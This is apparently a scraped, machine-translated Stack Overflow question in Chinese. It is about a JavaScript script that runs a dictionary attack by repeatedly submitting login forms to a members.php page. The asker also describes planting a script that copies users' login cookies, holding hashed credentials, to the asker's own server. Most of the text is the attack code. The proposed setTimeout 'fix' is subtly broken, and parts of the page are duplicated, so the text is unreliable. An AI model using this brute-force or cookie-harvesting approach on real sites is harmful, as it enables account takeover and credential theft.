Javascript 检查字典攻击期间尝试是否成功
我正在做一个项目,在那里我必须执行字典攻击。我正在运行一个脚本,该脚本发布到登录页面将发布到的页面(比如members.php)。在输入正确的用户名和密码后,服务器端发生的唯一事情是设置了cookie。Cookies的值为username和password的sha值。(是的,我可以访问源代码) 我在members.php中硬编码了一个脚本,这样每当有人登录时就会检索cookies的值,并将其存储在我服务器的文本文件中。因此,我将能够跟踪谁曾经成功登录 我正在尝试将以下脚本发布到members.php,以尝试查看逻辑是否有效:Javascript 检查字典攻击期间尝试是否成功,javascript,cookies,forms,dictionary-attack,http-post,Javascript,Cookies,Forms,Dictionary Attack,Http Post,我正在做一个项目,在那里我必须执行字典攻击。我正在运行一个脚本,该脚本发布到登录页面将发布到的页面(比如members.php)。在输入正确的用户名和密码后,服务器端发生的唯一事情是设置了cookie。Cookies的值为username和password的sha值。(是的,我可以访问源代码) 我在members.php中硬编码了一个脚本,这样每当有人登录时就会检索cookies的值,并将其存储在我服务器的文本文件中。因此,我将能够跟踪谁曾经成功登录 我正在尝试将以下脚本发布到members.p
function dictionary_run(username,password) {
var theForm, newInput7, newInput8, newInput9;
var i=0,j=0;
var bla3 = "Login";
theForm = document.createElement("form");
theForm.action = "URL/members.php";
theForm.method = "post";
newInput9 = document.createElement("input");
newInput9.type = "text";
newInput9.name = "username";
newInput9.value = username;
newInput8 = document.createElement("input");
newInput8.type = "password";
newInput8.name = "password";
newInput8.value = password;
newInput7 = document.createElement("input");
newInput7.type = "submit";
newInput7.name = "submit";
newInput7.value = bla3;
theForm.appendChild(newInput9);
theForm.appendChild(newInput8);
theForm.appendChild(newInput7);
newInput7.click();
}
function main() {
var user_name = ["jasmine", "fd", "jasmhghine","dfdf"];
var pass_word = ["jasmine", "jasminhge", "dffd","dfdfdf"];
var i,j;
for(i=0; i<4 ;i++) {
for(j=0; j<4;j++) {
dictionary_run(user_name[i],pass_word[j]);
}
}
}
main();
谢谢 好吧,我发现了问题,只是因为我在快速连续发布,只检查了最后的输入。所以我只用了几秒钟的延迟就成功了
for(i=0; i<4;i++) {
for(j=0; j<4;j++) {
var delay=5000;//1 seconds
setTimeout(function(){
dictionary_run(user_name[i],pass_word[j]);
},delay);
}
}
for(i=0; i<4;i++) {
for(j=0; j<4;j++) {
var delay=5000;//1 seconds
setTimeout(function(){
dictionary_run(user_name[i],pass_word[j]);
},delay);
}
}